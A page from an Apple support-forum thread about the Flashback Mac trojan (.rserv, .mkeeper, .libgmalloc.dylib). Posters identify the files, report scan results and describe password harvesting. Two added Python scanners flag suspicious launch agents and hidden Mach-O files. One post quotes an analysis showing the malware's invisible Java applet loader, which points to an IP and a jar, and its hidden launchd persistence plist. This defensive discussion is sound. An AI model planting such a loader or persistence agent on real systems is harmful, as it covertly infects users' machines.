chadonline

Q: .rserv wants to connect to cuojshtbohnt.com

I have the message:

.rserv wants to connect to cuojshtbohnt.com

What is .rserv? I googled it and couldn't locate anything legitimate.

thanks

MacBook Pro, Mac OS X (10.6.8)

Posted on Mar 31, 2012 3:18 PM

Page 13 of 16
  • by X423424X, Level 6 (14,237 points), Apr 6, 2012 2:34 PM in response to Marco g

    Thank you for doing that.  Don't have time to look at it right now (on my way out) but I downloaded it to see what I can see later.

  • by Bob Mayo, Level 1 (109 points), Mac OS X, Apr 6, 2012 5:05 PM in response to LysaM

    Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?

    If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?

    Thanks.

  • by fane_j, Level 4 (3,672 points), Apr 6, 2012 5:33 PM in response to Bob Mayo

    Bob Mayo wrote:

    Is .libgmalloc.dylib a legitimate file

    No.

    Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.

  • by X423424X, Level 6 (14,237 points), Apr 6, 2012 5:43 PM in response to Bob Mayo

    (post deleted -- somehow didn't notice fane_j gave the answer I was going to give)

  • by WZZZ, Level 6 (13,112 points), Mac OS X, Apr 6, 2012 6:01 PM in response to X423424X

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on BackDoor.Flashback.39 (this was brought up quickly earlier in this thread, but AFAIK never fully explored):

    http://vms.drweb.com/virus/?i=1816029

    <object type="application/x-java-applet" width="0" height="0"> <param name="s" value="1"/> <param name="q" value="2"/> <param name="svname" value="com.zeobit.keep"> <param name="svbname" value="mkeeper"> <param name="dname" value="Software Update"> <param name="lurl" value="31.31.79.87">'); <param name="archive" value="al-2.jar"> <param name="code" value="a.apl"> </object>

    The exploit saves an executable file to the hard disk, along with a plist file responsible for launching it.

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.zeobit.keep</string>  <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array> <key>RunAtLoad</key><true/> <key>StartInterval</key><integer>4212</integer> <key>StandardErrorPath</key><string>/dev/null</string>  <key>StandardOutPath</key><string>/dev/null</string> </dict> </plist>

    After launching, the trojan checks for the presence of components and, if at least one of them is present, terminates its own execution:
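The launchd plist quoted from Dr. Web above is the persistence mechanism for this variant: a `LaunchAgent` that runs a hidden dot-file from the user's home folder at login and again every `StartInterval` seconds, with both output streams sent to `/dev/null`. The script below is an added example (not from this thread, Dr. Web, or any poster's tool) that parses such plists with Python's standard `plistlib` and scores them against those traits. The Flashback sample is the plist from the post with the page's `<username>` placeholder replaced by a made-up account name so the XML parses; the benign agent, its label and its path are constructed for comparison.

```python
import plistlib
import tempfile
from pathlib import Path, PurePosixPath

# Constructed sample: the launch-agent plist quoted above from Dr. Web's
# BackDoor.Flashback.39 write-up, with the page's "<username>" placeholder
# replaced by a made-up account name ("victim") so that the XML parses.
FLASHBACK_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.zeobit.keep</string>
  <key>ProgramArguments</key><array><string>/Users/victim/.mkeeper</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>4212</integer>
  <key>StandardErrorPath</key><string>/dev/null</string>
  <key>StandardOutPath</key><string>/dev/null</string>
</dict>
</plist>
"""

# Constructed benign agent for comparison; label and path are hypothetical.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup-agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Backup.app/Contents/MacOS/backup-agent</string>
    <string>--quiet</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""


def triage_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one launchd plist and list the traits it shares with the Flashback agent."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or []
    program = data.get("Program") or (args[0] if args else "")
    path = PurePosixPath(program)
    reasons = []

    # Trait 1: the executable is a dot-file, hidden in Finder (~/.rserv, ~/.mkeeper).
    if path.name.startswith("."):
        reasons.append("program is a hidden dot-file: %s" % program)

    # Trait 2: it lives under /Users (a home folder or /Users/Shared) instead of an app bundle.
    if len(path.parts) > 2 and path.parts[1] == "Users":
        reasons.append("program lives under /Users rather than in an application bundle")

    # Trait 3: started at login and re-launched every StartInterval seconds.
    if data.get("RunAtLoad") and "StartInterval" in data:
        reasons.append("RunAtLoad with StartInterval=%s keeps it resident" % data["StartInterval"])

    # Trait 4: both output streams discarded, so nothing lands in a log.
    if data.get("StandardOutPath") == "/dev/null" and data.get("StandardErrorPath") == "/dev/null":
        reasons.append("stdout and stderr both discarded to /dev/null")

    return {
        "label": data.get("Label", ""),
        "program": program,
        "reasons": reasons,
        # Trait 3 alone is normal for many agents; two or more traits is worth a look.
        "suspicious": len(reasons) >= 2,
    }


def scan_launch_agents(directory: Path) -> list:
    """Triage every .plist in a LaunchAgents/LaunchDaemons folder, returning the suspicious ones."""
    findings = []
    for plist_path in sorted(directory.glob("*.plist")):
        try:
            result = triage_launch_agent(plist_path.read_bytes())
        except Exception as exc:  # malformed plist: report it rather than skipping silently
            findings.append({"label": plist_path.name, "program": "",
                             "reasons": ["unparseable: %s" % exc], "suspicious": True})
            continue
        if result["suspicious"]:
            result["file"] = str(plist_path)
            findings.append(result)
    return findings


if __name__ == "__main__":
    # Demo on a constructed LaunchAgents folder holding both samples.
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "com.zeobit.keep.plist").write_bytes(FLASHBACK_AGENT)
        (folder / "com.example.backup-agent.plist").write_bytes(BENIGN_AGENT)
        for hit in scan_launch_agents(folder):
            print(hit["file"], hit["label"])
            for reason in hit["reasons"]:
                print("   -", reason)
```

Pointing `scan_launch_agents` at `~/Library/LaunchAgents` reports only agents that match two or more traits, which keeps ordinary user-installed agents (that merely use `RunAtLoad` and `StartInterval`) out of the output while the `~/.rserv` and `~/.mkeeper` pattern from this thread scores on all four.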

  • by BoomerangJ111, Level 1 (4 points), Desktops, Apr 6, 2012 6:02 PM in response to X423424X

    Deleted-incorrect data

  • by Topher Kessler, Level 6 (9,866 points), Apr 6, 2012 6:14 PM in response to Bob Mayo

    It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.

  • by fane_j, Level 4 (3,672 points), Apr 6, 2012 6:20 PM in response to WZZZ

    WZZZ wrote:

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

    " value="com.zeobit.keep">

    I can't say for certain, but I'm fairly sure they've nothing to do with it, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".

    Methinks this is the one instance where MacKeeper is not to blame.

  • by Topher Kessler, Level 6 (9,866 points), Apr 6, 2012 6:21 PM in response to WZZZ

    Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats does raise questions, but so far it's not too conclusive.

  • by X423424X, Level 6 (14,237 points), Apr 6, 2012 6:29 PM in response to WZZZ

    WZZZ wrote:

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

    The second one looks identical to the one that started this thread, only executing ~/.mkeeper instead of ~/.rserv.

    The first one I never saw before. But there is a reference to some Java code called al-2.jar.

  • by MadMacs0, Level 5 (4,791 points), Apr 6, 2012 10:12 PM in response to Marco g

    Marco g wrote:

    If anybody is interested, i renamed it to "flserv" uploaded

    Thanks for doing that. It's the first sample I've been able to collect with this variant.

    Readers will be happy to know the results of the following scans:

    ClamXav identified it as OSX.Flashback-8.

    Sophos Home Edition 8 identified it as OSX/Flshplyr-D.

    MacScan did not detect anything.

    12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."

  • by Matt Durben, Level 1 (1 point), Apr 6, 2012 11:20 PM in response to chadonline

    Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on pw's that have been saved in ff/safari?

  • by MadMacs0, Level 5 (4,791 points), Apr 6, 2012 11:53 PM in response to Matt Durben

    Matt Durben wrote:

    Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on pw's that have been saved in ff/safari?

    I'm certain both the Type 1 and Type 2 infections have the same goal: to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal, which I just looked up earlier this evening in a February post, Flashback Mac Trojan Horse Infections Increasing with New Variant, where they say:

    This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)

    In a subsequent article they figured out that the results of this harvest are using Twitter to communicate back to the "Mother Ship" periodically, using a specific hash tag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.

  • by etresoft, Level 7 (29,320 points), Mac OS X, Apr 7, 2012 9:37 AM in response to chadonline

    I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271

  • by dianeoforegon, Level 5 (5,741 points), Mac OS X, Apr 7, 2012 4:22 PM in response to Topher Kessler

    For Office 2004 users that are infected we are seeing this in their crash logs:

    dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib
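Two posts in this thread describe the same indicator from different angles. fane_j's rule above is that a shared code library whose file name begins with a dot is almost never legitimate, because dot-files normally hold configuration, not code; dianeoforegon's crash log shows dyld failing to load exactly such a file (the "inserted library" wording is dyld's message for a library named in the `DYLD_INSERT_LIBRARIES` environment variable). The scanner below is an added example, not a tool from this thread or from any poster, that applies fane_j's combination mechanically: walk a tree, keep only dot-files, and report those whose first bytes are a Mach-O header. The directory tree it scans is constructed in a temporary folder; the file names `.libgmalloc.dylib` and `.rserv` come from the thread, while `.svcupd`, `libhelper.dylib` and the account name are hypothetical.

```python
import os
import struct
import tempfile
from pathlib import Path

# Thin Mach-O headers in both byte orders, as found at the start of any
# native executable or .dylib on Mac OS X.
THIN_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # MH_MAGIC / MH_CIGAM (32-bit)
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # MH_MAGIC_64 / MH_CIGAM_64
}
FAT_MAGICS = {b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca"}  # FAT_MAGIC / FAT_CIGAM (universal)


def is_macho(path: Path) -> bool:
    """True if the file starts with a Mach-O thin or universal (fat) header."""
    try:
        with open(path, "rb") as f:
            head = f.read(8)
    except OSError:
        return False
    if head[:4] in THIN_MAGICS:
        return True
    if head[:4] in FAT_MAGICS and len(head) == 8:
        # Java class files share 0xCAFEBABE. A real fat header follows the magic
        # with a small architecture count; a class file follows it with a version
        # number (>= 45), so a heuristic upper bound separates the two.
        nfat_arch = struct.unpack(">I", head[4:8])[0]
        return 0 < nfat_arch < 16
    return False


def find_hidden_code(root: Path) -> list:
    """Return every file under root whose name starts with '.' and whose content is Mach-O."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.startswith("."):
                continue  # visible files are out of scope for this heuristic
            p = Path(dirpath) / name
            if p.is_symlink():
                continue  # do not follow links out of the tree being scanned
            if is_macho(p):
                hits.append(p)
    return sorted(hits)


def build_sample_tree() -> Path:
    """Constructed directory tree standing in for /Users; returns its root."""
    root = Path(tempfile.mkdtemp(prefix="hidden-code-"))
    shared = root / "Shared"
    home = root / "someuser"          # hypothetical account
    lib = home / "Library"
    for d in (shared, home, lib):
        d.mkdir(parents=True)
    # Hidden 64-bit Mach-O, named like the library in the crash log above.
    (shared / ".libgmalloc.dylib").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 60)
    # Hidden 32-bit Mach-O, named like the original post's ~/.rserv.
    (home / ".rserv").write_bytes(b"\xce\xfa\xed\xfe" + b"\x00" * 60)
    # Hidden universal binary with two architectures (hypothetical name).
    (home / ".svcupd").write_bytes(b"\xca\xfe\xba\xbe" + struct.pack(">I", 2) + b"\x00" * 56)
    # Hidden files that are NOT code and must not be flagged.
    (home / ".bash_profile").write_text("export PATH=$PATH:/usr/local/bin\n")
    (home / ".DS_Store").write_bytes(b"\x00\x00\x00\x01Bud1" + b"\x00" * 56)
    (home / ".Example.class").write_bytes(b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"\x00" * 56)
    # A visible library: code, but not hidden, so fane_j's combination does not apply.
    (lib / "libhelper.dylib").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 60)
    return root


if __name__ == "__main__":
    for hit in find_hidden_code(build_sample_tree()):
        print("hidden Mach-O:", hit)
```

Run against `/Users` on a real machine, `find_hidden_code` reads only the first eight bytes of each dot-file, so it is cheap even over a large home folder; anything it reports is worth checking against the removal guidance linked earlier in the thread rather than deleted on sight, since the byte check only says "this is native code", not what the code does.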
